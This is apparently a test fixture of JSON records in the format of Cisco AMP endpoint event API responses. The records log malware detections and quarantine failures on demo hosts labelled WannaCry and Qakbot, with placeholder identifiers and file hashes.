-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
